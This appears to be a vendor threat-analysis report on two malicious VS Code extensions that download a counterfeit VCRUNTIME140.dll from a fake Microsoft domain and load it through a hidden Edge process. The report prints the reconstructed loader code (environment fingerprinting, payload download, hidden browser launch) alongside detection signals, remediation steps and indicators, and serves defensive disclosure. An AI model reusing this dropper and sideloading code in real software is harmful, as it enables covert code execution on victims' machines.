Native code is the hardest layer of a VS Code extension to automatically audit. The worldline.aicodefix campaign exploited this by dressing its payload as a Microsoft Visual C++ runtime DLL and delivering it through a fake Microsoft service domain.

Executive Summary

  • Extensions: worldline.aicodefix-0.0.1, kazan.myworldline-0.0.1
  • Behavior: Downloads a counterfeit VCRUNTIME140.dll from msdn-service[.]com, writes it to a fake Microsoft\Edge\User Data\Domain Actions\3.0.0.18 directory, launches a hidden msedge.exe process, then kills it
  • Environment check: First three characters of USERDOMAIN must hash to a42403182a41381c625671f9a1c6132625efb355bd9255d22607e7392322fc23, and C:\Program Files (x86)\FastTrack Software\Admin By Request\AdminByRequest.exe must exist
  • Risk score: Up to 96
  • Campaign status: 2 seed samples; retro-hunt isolated

Technical Analysis

A Visual C++ runtime DLL is part of the invisible plumbing on every Windows machine. Most users and many scanners assume that VCRUNTIME140.dll is Microsoft code. The operator abuses that assumption by downloading a custom DLL with the same name and placing it in a directory tree that looks like a legitimate Edge profile: %LOCALAPPDATA%\Microsoft\Edge\User Data\Domain Actions\3.0.0.18\VCRUNTIME140.dll.

The delivery is split across three pieces:

  1. A benign-looking VS Code extension (AI Code Fix - WL, VS Code Update) that runs proprietary/startuplogic.js on activation.
  2. A fake Microsoft host msdn-service.com that serves the payload as assets/ico.bmp.
  3. A hidden msedge.exe window that loads the dropped DLL from the spoofed user-data directory.

By the time anyone notices, the payload is already on disk in a Microsoft-shaped path.

Startup and Anti-Analysis

Both variants ship a dist/proprietary/startuplogic.js file that is obfuscated with a custom string decoder. The worldline and kazan files are functionally identical; only the obfuscator variable names differ. The extension’s main entry point simply imports and runs it:

const { runStartupLogic } = require('./proprietary/startupLogic');
runStartupLogic();

Before fetching any additional data, the sample performs an environment check to validate the machine. It checks that process.env.USERDOMAIN is not null and that the SHA-256 of its first three characters equals:

a42403182a41381c625671f9a1c6132625efb355bd9255d22607e7392322fc23

It also verifies that the following file exists:

C:\Program Files (x86)\FastTrack Software\Admin By Request\AdminByRequest.exe

These checks make the extension a targeted implant rather than a scattershot dropper. It only activates in environments that look like the intended victim.

Payload Download

If the environment check passes, the script builds a target path under the user’s local AppData:

const PAYLOAD_URL = 'hxxps://msdn-service[.]com/assets/ico.bmp';
const PAYLOAD_NAME = 'VCRUNTIME140.dll';
const TARGET_DIR = path.join(
  process.env.LOCALAPPDATA,
  'Microsoft',
  'Edge',
  'User Data',
  'Domain Actions',
  '3.0.0.18'
);
const TARGET_FILE = path.join(TARGET_DIR, PAYLOAD_NAME);

It downloads ico.bmp with rejectUnauthorized: false, writes it to TARGET_FILE.tmp, then renames it to VCRUNTIME140.dll:

fs.mkdirSync(TARGET_DIR, { recursive: true });
https.get(PAYLOAD_URL, GET_OPTS, (res) => {
  const chunks = [];
  res.on('data', c => chunks.push(c));
  res.on('end', () => {
    const tmpFile = TARGET_FILE + '.tmp';
    fs.writeFileSync(tmpFile, Buffer.concat(chunks));
    fs.renameSync(tmpFile, TARGET_FILE);
  });
});

The .bmp extension is a content disguise; the file on disk is a DLL with a Microsoft runtime name.

DLL Loading via Edge

After the drop, the script launches Microsoft Edge off-screen and points it at the fake user-data directory:

const EDGE_PATH = 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe';
const child = child_process.spawn(EDGE_PATH, [
  '--window-position=-32000,-32000',
  '--window-size=1,1'
], {
  detached: true,
  stdio: 'ignore',
  windowsHide: true
});
child.unref();

The --window-position=-32000,-32000 and --window-size=1,1 flags keep the browser invisible. After a delay, it kills the spawned process with taskkill /IM msedge.exe. The purpose of the Edge launch is to load the counterfeit VCRUNTIME140.dll from the attacker-controlled directory and execute its exported code inside a trusted Microsoft process.

Why it evades detection

Defender assumption What the sample actually does
msdn-service.com is a Microsoft domain It is a counterfeit host serving a DLL disguised as ico.bmp
VCRUNTIME140.dll is a trusted system file This one is downloaded and dropped by the extension
%LOCALAPPDATA%\Microsoft\Edge\User Data is normal The path is forged; Domain Actions\3.0.0.18 is attacker-controlled
msedge.exe spawning from an extension is unusual but harmless It is used to load the fake DLL invisibly
The extension has no malicious strings The URL and command line are built at runtime from obfuscated arrays

What we are doing about it

Argus detects this family through behavioral signals rather than relying on a static rule:

  • hxxps://msdn-service[.]com or similar counterfeit Microsoft service domains
  • Extensions that write VCRUNTIME140.dll or other runtime-named files under %LOCALAPPDATA%\Microsoft\Edge\User Data
  • msedge.exe spawned with hidden-window flags from an extension process
  • process.env.USERDOMAIN fingerprinting and file-existence checks for AdminByRequest.exe
  • the worldline / kazan publisher pair

Retro-hunting the local corpus found no additional matches, so this is a small campaign, but the technique is easy to copy.

Remediation and recommendations

  1. Remove worldline.aicodefix and kazan.myworldline from all installs.
  2. Block msdn-service.com and assets/ico.bmp at the network layer.
  3. Alert on extensions writing DLLs into %LOCALAPPDATA%\Microsoft\Edge\User Data or subdirectories that do not belong to a real Edge profile.
  4. Monitor msedge.exe launches with --window-position=-32000,-32000 or --window-size=1,1 from non-browser parent processes.
  5. Treat USERDOMAIN fingerprinting and checks for AdminByRequest.exe as targeted-implant behavior.

Indicators

Type Value
Extensions worldline.aicodefix-0.0.1, kazan.myworldline-0.0.1
VSIX SHA-256 (worldline) c3551ba266b56b5b5355ee27ad626877d19184112c0d23123f230b749d87e94b
VSIX SHA-256 (kazan) 7c49a622e73361fcebefc18ec1990ace93ca7dd776be66a263ae51db05bae06d
Fake service hxxps://msdn-service[.]com/assets/ico.bmp
Fake DLL name VCRUNTIME140.dll
Drop path %LOCALAPPDATA%\Microsoft\Edge\User Data\Domain Actions\3.0.0.18\VCRUNTIME140.dll
Target executable C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Edge launch flags --window-position=-32000,-32000, --window-size=1,1
Cleanup command taskkill /IM msedge.exe
Expected parent file C:\Program Files (x86)\FastTrack Software\Admin By Request\AdminByRequest.exe
USERDOMAIN hash a42403182a41381c625671f9a1c6132625efb355bd9255d22607e7392322fc23
Detection focus Fake-MSDN DLL + hidden Edge loader + targeted env fingerprinting

The worldline campaign shows that the native layer of a VS Code: extension is still a blind spot. A counterfeit DLL with a plausible name, a fake Microsoft host, and a hidden browser process is enough to run arbitrary code outside the JavaScript sandbox.